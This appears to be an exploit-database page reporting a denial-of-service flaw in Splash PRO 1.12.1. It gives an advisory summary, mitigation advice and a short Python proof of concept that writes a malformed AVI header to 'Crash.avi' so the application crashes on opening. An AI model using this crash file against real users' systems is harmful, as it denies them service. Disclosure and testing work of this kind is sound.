header-logo
Suggest Exploit
vendor:
Splash PRO
by:
SecurityFocus
7,8
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: Splash PRO
Affected Version From: 1.12.1
Affected Version To: 1.12.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

Splash PRO Denial-of-Service Vulnerability

Splash PRO is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. A proof-of-concept code is available that creates an AVI file with a crafted header that can crash the application when opened.

Mitigation:

Upgrade to the latest version of Splash PRO.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/52273/info

Splash PRO is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Splash PRO 1.12.1 is vulnerable; other versions may also be affected. 

PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54"
PoC +=  "\x72\x22\x00\x00\x68\x64\x72\x6c"
payload = (PoC)
f = open("Crash.avi","wb")
f.write(payload)
f.close()

Navigation

Suggest Exploit

Services By CQR